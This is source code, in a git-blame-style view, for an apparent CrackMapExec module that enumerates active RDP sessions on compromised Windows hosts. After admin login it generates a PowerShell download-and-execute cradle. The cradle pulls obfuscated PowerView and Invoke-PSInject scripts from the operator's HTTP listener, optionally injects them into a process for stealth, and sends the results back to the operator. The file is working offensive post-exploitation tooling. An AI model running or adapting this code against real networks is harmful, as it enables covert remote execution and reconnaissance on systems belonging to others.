2017-04-07 04:34:30 +00:00
|
|
|
from cme.helpers.powershell import *
|
|
|
|
from cme.helpers.logger import write_log, highlight
|
|
|
|
from datetime import datetime
|
2020-01-18 12:20:10 +00:00
|
|
|
from io import StringIO
|
2017-04-07 04:34:30 +00:00
|
|
|
|
|
|
|
class CMEModule:
|
|
|
|
|
|
|
|
name = 'get_netrdpsession'
|
|
|
|
description = "Enumerates all active RDP sessions"
|
|
|
|
supported_protocols = ['smb', 'mssql']
|
|
|
|
opsec_safe = True
|
|
|
|
multiple_hosts = True
|
|
|
|
|
|
|
|
def options(self, context, module_options):
|
|
|
|
'''
|
2017-05-08 05:19:04 +00:00
|
|
|
INJECT If set to true, this allows PowerView to work over 'stealthier' execution methods which have non-interactive contexts (e.g. WMI) (default: True)
|
2017-04-07 04:34:30 +00:00
|
|
|
'''
|
|
|
|
|
|
|
|
self.exec_methods = ['smbexec', 'atexec']
|
2017-05-08 05:19:04 +00:00
|
|
|
self.inject = True
|
2017-04-07 04:34:30 +00:00
|
|
|
if 'INJECT' in module_options:
|
|
|
|
self.inject = bool(module_options['INJECT'])
|
|
|
|
|
|
|
|
if self.inject: self.exec_methods = None
|
2017-04-30 19:28:09 +00:00
|
|
|
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
|
2017-04-07 04:34:30 +00:00
|
|
|
self.ps_script2 = obfs_ps_script('powersploit/Recon/PowerView.ps1')
|
|
|
|
|
|
|
|
def on_admin_login(self, context, connection):
|
|
|
|
command = 'Get-NetRDPSession | Out-String'
|
|
|
|
launcher = gen_ps_iex_cradle(context, 'PowerView.ps1', command)
|
|
|
|
|
|
|
|
if self.inject:
|
|
|
|
launcher = gen_ps_inject(launcher, context, inject_once=True)
|
|
|
|
|
2017-10-25 06:45:58 +00:00
|
|
|
connection.ps_execute(launcher, methods=self.exec_methods)
|
2017-04-07 04:34:30 +00:00
|
|
|
|
|
|
|
context.log.success('Executed launcher')
|
|
|
|
|
|
|
|
def on_request(self, context, request):
|
|
|
|
if 'Invoke-PSInject.ps1' == request.path[1:]:
|
|
|
|
request.send_response(200)
|
|
|
|
request.end_headers()
|
|
|
|
|
|
|
|
request.wfile.write(self.ps_script1)
|
|
|
|
|
|
|
|
elif 'PowerView.ps1' == request.path[1:]:
|
|
|
|
request.send_response(200)
|
|
|
|
request.end_headers()
|
|
|
|
|
|
|
|
request.wfile.write(self.ps_script2)
|
|
|
|
|
|
|
|
else:
|
|
|
|
request.send_response(404)
|
|
|
|
request.end_headers()
|
|
|
|
|
|
|
|
def on_response(self, context, response):
|
|
|
|
response.send_response(200)
|
|
|
|
response.end_headers()
|
2020-01-18 12:20:10 +00:00
|
|
|
length = int(response.headers.get('content-length'))
|
|
|
|
data = response.rfile.read(length).decode()
|
2017-04-07 04:34:30 +00:00
|
|
|
|
|
|
|
#We've received the response, stop tracking this host
|
|
|
|
response.stop_tracking_host()
|
|
|
|
|
|
|
|
if len(data):
|
|
|
|
buf = StringIO(data).readlines()
|
|
|
|
for line in buf:
|
|
|
|
line = line.replace('\r\n', '\n').strip()
|
|
|
|
context.log.highlight(line)
|